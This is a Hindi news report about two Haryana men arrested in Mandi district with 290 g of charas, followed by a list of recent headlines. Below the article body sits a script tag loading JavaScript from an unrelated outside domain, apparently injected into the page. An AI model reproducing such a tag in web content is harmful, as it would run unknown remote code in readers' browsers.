मंडीः हरियाणा के दो युवकों से 290 ग्राम चरस बरामद

<p>जिला मंडी में सुंदरनगर थाना पुलिस ने हरियाणा के दो युवकों को 290 ग्राम चरस के साथ पकड़ा। ये कुल्लू मनाली से वापस हरिणाणा लौट रहे थे। पुलिस अधीक्षक शालिनी अग्निहोत्री ने बताया कि सुंदरनगर पुलिस ने शनिवार को जब नेशनल हाइवे पर नाका लगा रखा था तो हरियाणा नंबर की एक कार को रोका गया। जब उसकी तलाशी ली गई तो उसमें सवार वीरेंद्र पुत्र राम लाल गांव अकालगढ़, डाकघर बुढा खेरा, तहसील जुलाना, जिला जींद हरियाणा उम्र 30 साल और अंकित पुत्र देवी राम गांव और डाकघर उगलाना, तहसील हांसी जिला हिसार हरियाणा उम्र 29 साल के कब्जे से 290 ग्राम चरस मिली।</p>

<p>दोनों ही युवकों को एनडीपीएस एक्ट की धारा 20,29 के तहत सुंदरनगर थाना पुलिस ने गिरफ्तार कर लिया है। अब उन्हें अब कोर्ट में पेश किया जाएगा। युवकों से पुलिस पूछताछ कर रही है कि वह उन्होंने यह चरस कहां से खरीदी थी।</p>

<p><img src=”/media/gallery/images/image(1829).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>

Samachar First

Recent Posts

ग्रीन एनर्जी प्रोजेक्ट में बड़ा घोटाला, विक्रम सिंह ठाकुर का बड़ा दावा

स्कैम की जांच करवाए, नहीं तो भाजपा करेगी बड़े आंदोलन का आगाज धर्मशाला। पूर्व उद्योग…

10 mins ago

रेणुका विधानसभा क्षेत्र को उप मुख्यमंत्री का तोहफा, 2.40 करोड़ के विकास कार्यों का शुभारंभ

नाहन। उप मुख्यमंत्री मुकेश अग्निहोत्री ने आज जिला सिरमौर के श्री रेणुका जी विधान सभा…

15 hours ago

जानें कौन सी योजना देगी 1% ब्याज पर 20 लाख का शिक्षा ऋण

  Shimla: डॉ. वाईएस परमार ऋण योजना को सुक्‍खू सरकार ने विस्‍तार दिया है। योजना…

15 hours ago

28 सितंबर को शांतिपूर्ण प्रदर्शन, फैसला न आने पर जेल भरो आंदोलन

  Shimla: संजौली अवैध मस्जिद विवाद शांत नहीं हुआ है। 28 सितंबर को देवभूमि संघर्ष…

16 hours ago

कंगना का कांग्रेस पर करारा वार: कांग्रेस को बच्चे पालने का शौक, पप्पू और बहन की हरकतें बचकानी

  Mandi: मंडी के गोहर में एक कार्यक्रम में सांसद कंगना ने कांग्रेस के शीर्ष…

17 hours ago

पीएम मोदी कर रहे बदनाम, हिमाचलआर्थिक तंगी से नहीं जूझ रहा: डिप्टी सीएम

  Sirmour: उपमुख्यमंत्री मुकेश अग्निहोत्री ने आरोप लगाया है कि भाजपा के केंद्रीय व प्रदेश…

17 hours ago